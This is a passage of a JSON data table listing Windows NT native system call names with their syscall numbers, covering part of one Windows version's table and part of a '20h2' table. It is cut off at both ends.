\"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireCrossVmMutant\": 103, \"NtAcquireProcessActivityReference\": 104, \"NtAddAtomEx\": 105, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustGroupsToken\": 108, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertResumeThread\": 110, \"NtAlertThread\": 111, \"NtAlertThreadByThreadId\": 112, \"NtAllocateLocallyUniqueId\": 113, \"NtAllocateReserveObject\": 114, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtAllocateUuids\": 117, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcConnectPort\": 121, \"NtAlpcConnectPortEx\": 122, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtAreMappedFilesTheSame\": 142, \"NtAssignProcessToJobObject\": 143, \"NtAssociateWaitCompletionPacket\": 144, \"NtCallEnclave\": 145, \"NtCancelIoFileEx\": 146, \"NtCancelSynchronousIoFile\": 147, \"NtCancelTimer2\": 148, \"NtCancelWaitCompletionPacket\": 149, \"NtCommitComplete\": 150, \"NtCommitEnlistment\": 151, \"NtCommitRegistryTransaction\": 152, \"NtCommitTransaction\": 153, \"NtCompactKeys\": 154, \"NtCompareObjects\": 155, \"NtCompareSigningLevels\": 156, \"NtCompareTokens\": 157, \"NtCompleteConnectPort\": 158, \"NtCompressKey\": 159, \"NtConnectPort\": 160, \"NtContinueEx\": 161, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 162, \"NtCreateCrossVmEvent\": 163, \"NtCreateCrossVmMutant\": 164, \"NtCreateDebugObject\": 165, \"NtCreateDirectoryObject\": 166, \"NtCreateDirectoryObjectEx\": 167, \"NtCreateEnclave\": 168, \"NtCreateEnlistment\": 169, \"NtCreateEventPair\": 170, \"NtCreateIRTimer\": 171, \"NtCreateIoCompletion\": 172, \"NtCreateJobObject\": 173, \"NtCreateJobSet\": 174, \"NtCreateKeyTransacted\": 175, \"NtCreateKeyedEvent\": 176, \"NtCreateLowBoxToken\": 177, \"NtCreateMailslotFile\": 178, \"NtCreateMutant\": 179, \"NtCreateNamedPipeFile\": 180, \"NtCreatePagingFile\": 181, \"NtCreatePartition\": 182, \"NtCreatePort\": 183, \"NtCreatePrivateNamespace\": 184, \"NtCreateProcess\": 185, \"NtCreateProfile\": 186, \"NtCreateProfileEx\": 187, \"NtCreateRegistryTransaction\": 188, \"NtCreateResourceManager\": 189, \"NtCreateSectionEx\": 190, \"NtCreateSemaphore\": 191, \"NtCreateSymbolicLinkObject\": 192, \"NtCreateThreadEx\": 193, \"NtCreateTimer\": 194, \"NtCreateTimer2\": 195, \"NtCreateToken\": 196, \"NtCreateTokenEx\": 197, \"NtCreateTransaction\": 198, \"NtCreateTransactionManager\": 199, \"NtCreateUserProcess\": 200, \"NtCreateWaitCompletionPacket\": 201, \"NtCreateWaitablePort\": 202, \"NtCreateWnfStateName\": 203, \"NtCreateWorkerFactory\": 204, \"NtDebugActiveProcess\": 205, \"NtDebugContinue\": 206, \"NtDeleteAtom\": 207, \"NtDeleteBootEntry\": 208, \"NtDeleteDriverEntry\": 209, \"NtDeleteFile\": 210, \"NtDeleteKey\": 211, \"NtDeleteObjectAuditAlarm\": 212, \"NtDeletePrivateNamespace\": 213, \"NtDeleteValueKey\": 214, \"NtDeleteWnfStateData\": 215, \"NtDeleteWnfStateName\": 216, \"NtDirectGraphicsCall\": 217, \"NtDisableLastKnownGood\": 218, \"NtDisplayString\": 219, \"NtDrawText\": 220, \"NtEnableLastKnownGood\": 221, \"NtEnumerateBootEntries\": 222, \"NtEnumerateDriverEntries\": 223, \"NtEnumerateSystemEnvironmentValuesEx\": 224, \"NtEnumerateTransactionObject\": 225, \"NtExtendSection\": 226, \"NtFilterBootOption\": 227, \"NtFilterToken\": 228, \"NtFilterTokenEx\": 229, \"NtFlushBuffersFileEx\": 230, \"NtFlushInstallUILanguage\": 231, \"NtFlushInstructionCache\": 232, \"NtFlushKey\": 233, \"NtFlushProcessWriteBuffers\": 234, \"NtFlushVirtualMemory\": 235, \"NtFlushWriteBuffer\": 236, \"NtFreeUserPhysicalPages\": 237, \"NtFreezeRegistry\": 238, \"NtFreezeTransactions\": 239, \"NtGetCachedSigningLevel\": 240, \"NtGetCompleteWnfStateSubscription\": 241, \"NtGetContextThread\": 242, \"NtGetCurrentProcessorNumber\": 243, \"NtGetCurrentProcessorNumberEx\": 244, \"NtGetDevicePowerState\": 245, \"NtGetMUIRegistryInfo\": 246, \"NtGetNextProcess\": 247, \"NtGetNextThread\": 248, \"NtGetNlsSectionPtr\": 249, \"NtGetNotificationResourceManager\": 250, \"NtGetWriteWatch\": 251, \"NtImpersonateAnonymousToken\": 252, \"NtImpersonateThread\": 253, \"NtInitializeEnclave\": 254, \"NtInitializeNlsFiles\": 255, \"NtInitializeRegistry\": 256, \"NtInitiatePowerAction\": 257, \"NtIsSystemResumeAutomatic\": 258, \"NtIsUILanguageComitted\": 259, \"NtListenPort\": 260, \"NtLoadDriver\": 261, \"NtLoadEnclaveData\": 262, \"NtLoadKey\": 263, \"NtLoadKey2\": 264, \"NtLoadKeyEx\": 265, \"NtLockFile\": 266, \"NtLockProductActivationKeys\": 267, \"NtLockRegistryKey\": 268, \"NtLockVirtualMemory\": 269, \"NtMakePermanentObject\": 270, \"NtMakeTemporaryObject\": 271, \"NtManageHotPatch\": 272, \"NtManagePartition\": 273, \"NtMapCMFModule\": 274, \"NtMapUserPhysicalPages\": 275, \"NtMapViewOfSectionEx\": 276, \"NtModifyBootEntry\": 277, \"NtModifyDriverEntry\": 278, \"NtNotifyChangeDirectoryFile\": 279, \"NtNotifyChangeDirectoryFileEx\": 280, \"NtNotifyChangeKey\": 281, \"NtNotifyChangeMultipleKeys\": 282, \"NtNotifyChangeSession\": 283, \"NtOpenEnlistment\": 284, \"NtOpenEventPair\": 285, \"NtOpenIoCompletion\": 286, \"NtOpenJobObject\": 287, \"NtOpenKeyEx\": 288, \"NtOpenKeyTransacted\": 289, \"NtOpenKeyTransactedEx\": 290, \"NtOpenKeyedEvent\": 291, \"NtOpenMutant\": 292, \"NtOpenObjectAuditAlarm\": 293, \"NtOpenPartition\": 294, \"NtOpenPrivateNamespace\": 295, \"NtOpenProcessToken\": 296, \"NtOpenRegistryTransaction\": 297, \"NtOpenResourceManager\": 298, \"NtOpenSemaphore\": 299, \"NtOpenSession\": 300, \"NtOpenSymbolicLinkObject\": 301, \"NtOpenThread\": 302, \"NtOpenTimer\": 303, \"NtOpenTransaction\": 304, \"NtOpenTransactionManager\": 305, \"NtPlugPlayControl\": 306, \"NtPrePrepareComplete\": 307, \"NtPrePrepareEnlistment\": 308, \"NtPrepareComplete\": 309, \"NtPrepareEnlistment\": 310, \"NtPrivilegeCheck\": 311, \"NtPrivilegeObjectAuditAlarm\": 312, \"NtPrivilegedServiceAuditAlarm\": 313, \"NtPropagationComplete\": 314, \"NtPropagationFailed\": 315, \"NtPssCaptureVaSpaceBulk\": 316, \"NtPulseEvent\": 317, \"NtQueryAuxiliaryCounterFrequency\": 318, \"NtQueryBootEntryOrder\": 319, \"NtQueryBootOptions\": 320, \"NtQueryDebugFilterState\": 321, \"NtQueryDirectoryFileEx\": 322, \"NtQueryDirectoryObject\": 323, \"NtQueryDriverEntryOrder\": 324, \"NtQueryEaFile\": 325, \"NtQueryFullAttributesFile\": 326, \"NtQueryInformationAtom\": 327, \"NtQueryInformationByName\": 328, \"NtQueryInformationEnlistment\": 329, \"NtQueryInformationJobObject\": 330, \"NtQueryInformationPort\": 331, \"NtQueryInformationResourceManager\": 332, \"NtQueryInformationTransaction\": 333, \"NtQueryInformationTransactionManager\": 334, \"NtQueryInformationWorkerFactory\": 335, \"NtQueryInstallUILanguage\": 336, \"NtQueryIntervalProfile\": 337, \"NtQueryIoCompletion\": 338, \"NtQueryLicenseValue\": 339, \"NtQueryMultipleValueKey\": 340, \"NtQueryMutant\": 341, \"NtQueryOpenSubKeys\": 342, \"NtQueryOpenSubKeysEx\": 343, \"NtQueryPortInformationProcess\": 344, \"NtQueryQuotaInformationFile\": 345, \"NtQuerySecurityAttributesToken\": 346, \"NtQuerySecurityObject\": 347, \"NtQuerySecurityPolicy\": 348, \"NtQuerySemaphore\": 349, \"NtQuerySymbolicLinkObject\": 350, \"NtQuerySystemEnvironmentValue\": 351, \"NtQuerySystemEnvironmentValueEx\": 352, \"NtQuerySystemInformationEx\": 353, \"NtQueryTimerResolution\": 354, \"NtQueryWnfStateData\": 355, \"NtQueryWnfStateNameInformation\": 356, \"NtQueueApcThreadEx\": 357, \"NtRaiseException\": 358, \"NtRaiseHardError\": 359, \"NtReadOnlyEnlistment\": 360, \"NtRecoverEnlistment\": 361, \"NtRecoverResourceManager\": 362, \"NtRecoverTransactionManager\": 363, \"NtRegisterProtocolAddressInformation\": 364, \"NtRegisterThreadTerminatePort\": 365, \"NtReleaseKeyedEvent\": 366, \"NtReleaseWorkerFactoryWorker\": 367, \"NtRemoveIoCompletionEx\": 368, \"NtRemoveProcessDebug\": 369, \"NtRenameKey\": 370, \"NtRenameTransactionManager\": 371, \"NtReplaceKey\": 372, \"NtReplacePartitionUnit\": 373, \"NtReplyWaitReplyPort\": 374, \"NtRequestPort\": 375, \"NtResetEvent\": 376, \"NtResetWriteWatch\": 377, \"NtRestoreKey\": 378, \"NtResumeProcess\": 379, \"NtRevertContainerImpersonation\": 380, \"NtRollbackComplete\": 381, \"NtRollbackEnlistment\": 382, \"NtRollbackRegistryTransaction\": 383, \"NtRollbackTransaction\": 384, \"NtRollforwardTransactionManager\": 385, \"NtSaveKey\": 386, \"NtSaveKeyEx\": 387, \"NtSaveMergedKeys\": 388, \"NtSecureConnectPort\": 389, \"NtSerializeBoot\": 390, \"NtSetBootEntryOrder\": 391, \"NtSetBootOptions\": 392, \"NtSetCachedSigningLevel\": 393, \"NtSetCachedSigningLevel2\": 394, \"NtSetContextThread\": 395, \"NtSetDebugFilterState\": 396, \"NtSetDefaultHardErrorPort\": 397, \"NtSetDefaultLocale\": 398, \"NtSetDefaultUILanguage\": 399, \"NtSetDriverEntryOrder\": 400, \"NtSetEaFile\": 401, \"NtSetHighEventPair\": 402, \"NtSetHighWaitLowEventPair\": 403, \"NtSetIRTimer\": 404, \"NtSetInformationDebugObject\": 405, \"NtSetInformationEnlistment\": 406, \"NtSetInformationJobObject\": 407, \"NtSetInformationKey\": 408, \"NtSetInformationResourceManager\": 409, \"NtSetInformationSymbolicLink\": 410, \"NtSetInformationToken\": 411, \"NtSetInformationTransaction\": 412, \"NtSetInformationTransactionManager\": 413, \"NtSetInformationVirtualMemory\": 414, \"NtSetInformationWorkerFactory\": 415, \"NtSetIntervalProfile\": 416, \"NtSetIoCompletion\": 417, \"NtSetIoCompletionEx\": 418, \"NtSetLdtEntries\": 419, \"NtSetLowEventPair\": 420, \"NtSetLowWaitHighEventPair\": 421, \"NtSetQuotaInformationFile\": 422, \"NtSetSecurityObject\": 423, \"NtSetSystemEnvironmentValue\": 424, \"NtSetSystemEnvironmentValueEx\": 425, \"NtSetSystemInformation\": 426, \"NtSetSystemPowerState\": 427, \"NtSetSystemTime\": 428, \"NtSetThreadExecutionState\": 429, \"NtSetTimer2\": 430, \"NtSetTimerEx\": 431, \"NtSetTimerResolution\": 432, \"NtSetUuidSeed\": 433, \"NtSetVolumeInformationFile\": 434, \"NtSetWnfProcessNotificationEvent\": 435, \"NtShutdownSystem\": 436, \"NtShutdownWorkerFactory\": 437, \"NtSignalAndWaitForSingleObject\": 438, \"NtSinglePhaseReject\": 439, \"NtStartProfile\": 440, \"NtStopProfile\": 441, \"NtSubscribeWnfStateChange\": 442, \"NtSuspendProcess\": 443, \"NtSuspendThread\": 444, \"NtSystemDebugControl\": 445, \"NtTerminateEnclave\": 446, \"NtTerminateJobObject\": 447, \"NtTestAlert\": 448, \"NtThawRegistry\": 449, \"NtThawTransactions\": 450, \"NtTraceControl\": 451, \"NtTranslateFilePath\": 452, \"NtUmsThreadYield\": 453, \"NtUnloadDriver\": 454, \"NtUnloadKey\": 455, \"NtUnloadKey2\": 456, \"NtUnloadKeyEx\": 457, \"NtUnlockFile\": 458, \"NtUnlockVirtualMemory\": 459, \"NtUnmapViewOfSectionEx\": 460, \"NtUnsubscribeWnfStateChange\": 461, \"NtUpdateWnfStateData\": 462, \"NtVdmControl\": 463, \"NtWaitForAlertByThreadId\": 464, \"NtWaitForDebugEvent\": 465, \"NtWaitForKeyedEvent\": 466, \"NtWaitForWorkViaWorkerFactory\": 467, \"NtWaitHighEventPair\": 468, \"NtWaitLowEventPair\": 469, \"NtLoadKey3\": 470}, \"20h2\": {\"NtAccessCheck\": 0, \"NtWorkerFactoryWorkerReady\": 1, \"NtAcceptConnectPort\": 2, \"NtMapUserPhysicalPagesScatter\": 3, \"NtWaitForSingleObject\": 4, \"NtCallbackReturn\": 5, \"NtReadFile\": 6, \"NtDeviceIoControlFile\": 7, \"NtWriteFile\": 8, \"NtRemoveIoCompletion\": 9, \"NtReleaseSemaphore\": 10, \"NtReplyWaitReceivePort\": 11, \"NtReplyPort\": 12, \"NtSetInformationThread\": 13, \"NtSetEvent\": 14, \"NtClose\": 15, \"NtQueryObject\": 16, \"NtQueryInformationFile\": 17, \"NtOpenKey\": 18, \"NtEnumerateValueKey\": 19, \"NtFindAtom\": 20, \"NtQueryDefaultLocale\": 21, \"NtQueryKey\": 22, \"NtQueryValueKey\": 23, \"NtAllocateVirtualMemory\": 24, \"NtQueryInformationProcess\": 25, \"NtWaitForMultipleObjects32\": 26, \"NtWriteFileGather\": 27, \"NtSetInformationProcess\": 28, \"NtCreateKey\": 29, \"NtFreeVirtualMemory\": 30, \"NtImpersonateClientOfPort\": 31, \"NtReleaseMutant\": 32, \"NtQueryInformationToken\": 33, \"NtRequestWaitReplyPort\": 34, \"NtQueryVirtualMemory\": 35, \"NtOpenThreadToken\": 36, \"NtQueryInformationThread\": 37, \"NtOpenProcess\": 38, \"NtSetInformationFile\": 39, \"NtMapViewOfSection\": 40, \"NtAccessCheckAndAuditAlarm\": 41, \"NtUnmapViewOfSection\": 42, \"NtReplyWaitReceivePortEx\": 43, \"NtTerminateProcess\": 44, \"NtSetEventBoostPriority\": 45, \"NtReadFileScatter\": 46, \"NtOpenThreadTokenEx\": 47, \"NtOpenProcessTokenEx\": 48, \"NtQueryPerformanceCounter\": 49, \"NtEnumerateKey\": 50, \"NtOpenFile\": 51, \"NtDelayExecution\": 52, \"NtQueryDirectoryFile\": 53, \"NtQuerySystemInformation\": 54, \"NtOpenSection\": 55, \"NtQueryTimer\": 56, \"NtFsControlFile\": 57, \"NtWriteVirtualMemory\": 58, \"NtCloseObjectAuditAlarm\": 59, \"NtDuplicateObject\": 60, \"NtQueryAttributesFile\": 61, \"NtClearEvent\": 62, \"NtReadVirtualMemory\": 63, \"NtOpenEvent\": 64, \"NtAdjustPrivilegesToken\": 65, \"NtDuplicateToken\": 66, \"NtContinue\": 67, \"NtQueryDefaultUILanguage\": 68, \"NtQueueApcThread\": 69, \"NtYieldExecution\": 70, \"NtAddAtom\": 71, \"NtCreateEvent\": 72, \"NtQueryVolumeInformationFile\": 73, \"NtCreateSection\": 74, \"NtFlushBuffersFile\": 75, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtCreateThread\": 78, \"NtIsProcessInJob\": 79, \"NtProtectVirtualMemory\": 80, \"NtQuerySection\": 81, \"NtResumeThread\": 82, \"NtTerminateThread\": 83, \"NtReadRequestData\": 84, \"NtCreateFile\": 85, \"NtQueryEvent\": 86, \"NtWriteRequestData\": 87, \"NtOpenDirectoryObject\": 88, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtQuerySystemTime\": 90, \"NtWaitForMultipleObjects\": 91, \"NtSetInformationObject\": 92, \"NtCancelIoFile\": 93, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtSetValueKey\": 96, \"NtCancelTimer\": 97, \"NtSetTimer\": 98, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAcquireCrossVmMutant\": 103, \"NtAcquireProcessActivityReference\": 104, \"NtAddAtomEx\": 105, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustGroupsToken\": 108, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertResumeThread\": 110, \"NtAlertThread\": 111, \"NtAlertThreadByThreadId\": 112, \"NtAllocateLocallyUniqueId\": 113, \"NtAllocateReserveObject\": 114, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtAllocateUuids\": 117, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcConnectPort\": 121, \"NtAlpcConnectPortEx\": 122, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtAreMappedFilesTheSame\": 142, \"NtAssignProcessToJobObject\": 143, \"NtAssociateWaitCompletionPacket\": 144, \"NtCallEnclave\": 145, \"NtCancelIoFileEx\": 146, \"NtCancelSynchronousIoFile\": 147, \"NtCancelTimer2\": 148, \"NtCancelWaitCompletionPacket\": 149, \"NtCommitComplete\": 150, \"NtCommitEnlistment\": 151, \"NtCommitRegistryTransaction\": 152, \"NtCommitTransaction\": 153, \"NtCompactKeys\": 154, \"NtCompareObjects\": 155, \"NtCompareSigningLevels\": 156, \"NtCompareTokens\": 157, \"NtCompleteConnectPort\": 158, \"NtCompressKey\": 159, \"NtConnectPort\": 160, \"NtContinueEx\": 161, \"NtConvertBetweenAuxiliaryCounterAndPerformanceCounter\": 162, \"NtCreateCrossVmEvent\": 163, \"NtCreateCrossVmMutant\": 164, \"NtCreateDebugObject\": 165, \"NtCreateDirectoryObject\": 166, \"NtCreateDirectoryObjectEx\": 167, \"NtCreateEnclave\": 168, \"NtCreateEnlistment\": 169, \"NtCreateEventPair\": 170, \"NtCreateIRTimer\": 171, \"NtCreateIoCompletion\": 172, \"NtCreateJobObject\": 173, \"NtCreateJobSet\": 174, \"NtCreateKeyTransacted\": 175, \"NtCreateKeyedEvent\": 176, \"NtCreateLowBoxToken\": 177, \"NtCreateMailslotFile\": 178, \"NtCreateMutant\": 179, \"NtCreateNamedPipeFile\": 180, \"NtCreatePagingFile\": 181, \"NtCreatePartition\": 182, \"NtCreatePort\": 183, \"NtCreatePrivateNamespace\": 184, \"NtCreateProcess\": 185, \"NtCreateProfile\": 186, \"NtCreateProfileEx\": 187, \"NtCreateRegistryTransaction\": 188, \"NtCreateResourceManager\": 189, \"NtCreateSectionEx\": 190, \"NtCreateSemaphore\": 191, \"NtCreateSymbolicLinkObject\": 192, \"NtCreateThreadEx\": 193, \"NtCreateTimer\": 194, \"NtCreateTimer2\": 195, \"NtCreateToken\": 196, \"NtCreateTokenEx\": 197, \"NtCreateTransaction\": 198, \"NtCreateTransactionManager\": 199, \"NtCreateUserProcess\": 200, \"NtCreateWaitCompletionPacket\": 201, \"NtCreateWaitablePort\": 202, \"NtCreateWnfStateName\": 203, \"NtCreateWorkerFactory\": 204, \"NtDebugActiveProcess\": 205, \"NtDebugContinue\": 206, \"NtDeleteAtom\": 207, \"NtDeleteBootEntry\": 208, \"NtDeleteDriverEntry\": 209, \"NtDeleteFile\": 210, \"NtDeleteKey\": 211, \"NtDeleteObjectAuditAlarm\": 212, \"NtDeletePrivateNamespace\": 213, \"NtDeleteValueKey\": 214, \"NtDeleteWnfStateData\": 215, \"NtDeleteWnfStateName\": 216, \"NtDirectGraphicsCall\": 217, \"NtDisableLastKnownGood\": 218, \"NtDisplayString\": 219, \"NtDrawText\": 220, \"NtEnableLastKnownGood\": 221, \"NtEnumerateBootEntries\": 222, \"NtEnumerateDriverEntries\": 223, \"NtEnumerateSystemEnvironmentValuesEx\": 224, \"NtEnumerateTransactionObject\": 225, \"NtExtendSection\": 226, \"NtFilterBootOption\": 227, \"NtFilterToken\": 228, \"NtFilterTokenEx\": 229, \"NtFlushBuffersFileEx\": 230, \"NtFlushInstallUILanguage\": 231, \"NtFlushInstructionCache\": 232, \"NtFlushKey\": 233, \"NtFlushProcessWriteBuffers\": 234, \"NtFlushVirtualMemory\": 235, \"NtFlushWriteBuffer\": 236, \"NtFreeUserPhysicalPages\": 237, \"NtFreezeRegistry\": 238, \"NtFreezeTransactions\": 239, \"NtGetCachedSigningLevel\": 240, \"NtGetCompleteWnfStateSubscription\": 241, \"NtGetContextThread\": 242, \"NtGetCurrentProcessorNumber\": 243, \"NtGetCurrentProcessorNumberEx\": 244, \"NtGetDevicePowerState\": 245, \"NtGetMUIRegistryInfo\": 246, \"NtGetNextProcess\": 247, \"NtGetNextThread\": 248, \"NtGetNlsSectionPtr\": 249, \"NtGetNotificationResourceManager\": 250, \"NtGetWriteWatch\": 251, \"NtImpersonateAnonymousToken\": 252, \"NtImpersonateThread\": 253, \"NtInitializeEnclave\": 254, \"NtInitializeNlsFiles\": 255, \"NtInitializeRegistry\": 256, \"NtInitiatePowerAction\": 257, \"NtIsSystemResumeAutomatic\": 258, \"NtIsUILanguageComitted\": 259, \"NtListenPort\": 260, \"NtLoadDriver\": 261, \"NtLoadEnclaveData\": 262, \"NtLoadKey\": 263, \"NtLoadKey2\": 264, \"NtLoadKeyEx\": 265, \"NtLockFile\": 266, \"NtLockProductActivationKeys\": 267, \"NtLockRegistryKey\": 268, \"NtLockVirtualMemory\": 269, \"NtMakePermanentObject\": 270, \"NtMakeTemporaryObject\": 271, \"NtManageHotPatch\": 272, \"NtManagePartition\": 273, \"NtMapCMFModule\": 274, \"NtMapUserPhysicalPages\": 275, \"NtMapViewOfSectionEx\": 276, \"NtModifyBootEntry\": 277, \"NtModifyDriverEntry\": 278, \"NtNotifyChangeDirectoryFile\": 279, \"NtNotifyChangeDirectoryFileEx\": 280, \"NtNotifyChangeKey\": 281, \"NtNotifyChangeMultipleKeys\": 282, \"NtNotifyChangeSession\": 283, \"NtOpenEnlistment\": 284, \"NtOpenEventPair\": 285, \"NtOpenIoCompletion\": 286, \"NtOpenJobObject\": 287, \"NtOpenKeyEx\": 288, \"NtOpenKeyTransacted\": 289, \"NtOpenKeyTransactedEx\": 290, \"NtOpenKeyedEvent\": 291, \"NtOpenMutant\": 292, \"NtOpenObjectAuditAlarm\": 293, \"NtOpenPartition\": 294, \"NtOpenPrivateNamespace\": 295, \"NtOpenProcessToken\": 296, \"NtOpenRegistryTransaction\": 297, \"NtOpenResourceManager\": 298, \"NtOpenSemaphore\": 299, \"NtOpenSession\": 300, \"NtOpenSymbolicLinkObject\": 301, \"NtOpenThread\": 302, \"NtOpenTimer\": 303, \"NtOpenTransaction\": 304, \"NtOpenTransactionManager\": 305, \"NtPlugPlayControl\": 306, \"NtPrePrepareComplete\": 307, \"NtPrePrepareEnlistment\": 308, \"NtPrepareComplete\": 309, \"NtPrepareEnlistment\": 310, \"NtPrivilegeCheck\": 311, \"NtPrivilegeObjectAuditAlarm\": 312, \"NtPrivilegedServiceAuditAlarm\": 313, \"NtPropagationComplete\": 314, \"NtPropagationFailed\": 315, \"NtPssCaptureVaSpaceBulk\": 316, \"NtPulseEvent\": 317, \"NtQueryAuxiliaryCounterFrequency\": 318, \"NtQueryBootEntryOrder\": 319, \"NtQueryBootOptions\": 320, \"NtQueryDebugFilterState\": 321, \"NtQueryDirectoryFileEx\": 322, \"NtQueryDirectoryObject\": 323, \"NtQueryDriverEntryOrder\": 324, \"NtQueryEaFile\": 325, \"NtQueryFullAttributesFile\": 326, \"NtQueryInformationAtom\": 327, \"NtQueryInformationByName\": 328, \"NtQueryInformationEnlistment\": 329, \"NtQueryInformationJobObject\": 330, \"NtQueryInformationPort\": 331, \"NtQueryInformationResourceManager\": 332, \"NtQueryInformationTransaction\": 333, \"NtQueryInformationTransactionManager\": 334, \"NtQueryInformationWorkerFactory\": 335, \"NtQueryInstallUILanguage\": 336, \"NtQueryIntervalProfile\": 337, \"NtQueryIoCompletion\": 338, \"NtQueryLicenseValue\": 339, \"NtQueryMultipleValueKey\": 340, \"NtQueryMutant\": 341, \"NtQueryOpenSubKeys\": 342, \"NtQueryOpenSubKeysEx\": 343, \"NtQueryPortInformationProcess\": 344, \"NtQueryQuotaInformationFile\": 345, \"NtQuerySecurityAttributesToken\": 346, \"NtQuerySecurityObject\": 347, \"NtQuerySecurityPolicy\": 348, \"NtQuerySemaphore\": 349, \"NtQuerySymbolicLinkObject\": 350, \"NtQuerySystemEnvironmentValue\": 351, \"NtQuerySystemEnvironmentValueEx\": 352, \"NtQuerySystemInformationEx\": 353, \"NtQueryTimerResolution\": 354, \"NtQueryWnfStateData\": 355, \"NtQueryWnfStateNameInformation\": 356, \"NtQueueApcThreadEx\": 357, \"NtRaiseException\": 358, \"NtRaiseHardError\": 359, \"NtReadOnlyEnlistment\": 360, \"NtRecoverEnlistment\": 361, \"NtRecoverResourceManager\": 362, \"NtRecoverTransactionManager\": 363, \"NtRegisterProtocolAddressInformation\": 364, \"NtRegisterThreadTerminatePort\": 365, \"NtReleaseKeyedEvent\": 366, \"NtReleaseWorkerFactoryWorker\": 367, \"NtRemoveIoCompletionEx\": 368, \"NtRemoveProcessDebug\": 369, \"NtRenameKey\": 370, \"NtRenameTransactionManager\": 371, \"NtReplaceKey\": 372, \"NtReplacePartitionUnit\": 373, \"NtReplyWaitReplyPort\": 374, \"NtRequestPort\": 375, \"NtResetEvent\": 376, \"NtResetWriteWatch\": 377, \"NtRestoreKey\": 378, \"NtResumeProcess\": 379, \"NtRevertContainerImpersonation\": 380, \"NtRollbackComplete\": 381, \"NtRollbackEnlistment\": 382, \"NtRollbackRegistryTransaction\": 383, \"NtRollbackTransaction\": 384, \"NtRollforwardTransactionManager\": 385, \"NtSaveKey\": 386, \"NtSaveKeyEx\": 387, \"NtSaveMergedKeys\": 388, \"NtSecureConnectPort\": 389, \"NtSerializeBoot\": 390, \"NtSetBootEntryOrder\": 391, \"NtSetBootOptions\": 392, \"NtSetCachedSigningLevel\": 393, \"NtSetCachedSigningLevel2\": 394, \"NtSetContextThread\": 395, \"NtSetDebugFilterState\": 396, \"NtSetDefaultHardErrorPort\": 397, \"NtSetDefaultLocale\": 398, \"NtSetDefaultUILanguage\": 399, \"NtSetDriverEntryOrder\": 400, \"NtSetEaFile\": 401, \"NtSetHighEventPair\": 402, \"NtSetHighWaitLowEventPair\": 403, \"NtSetIRTimer\": 404, \"NtSetInformationDebugObject\": 405, \"NtSetInformationEnlistment\": 406, \"NtSetInformationJobObject\": 407, \"NtSetInformationKey\": 408, \"NtSetInformationResourceManager\": 409, \"NtSetInformationSymbolicLink\": 410, \"NtSetInformationToken\": 411, \"NtSetInformationTransaction\": 412, \"NtSetInformationTransactionManager\": 413, \"NtSetInformationVirtualMemory\": 414, \"NtSetInformationWorkerFactory\": 415, \"NtSetIntervalProfile\": 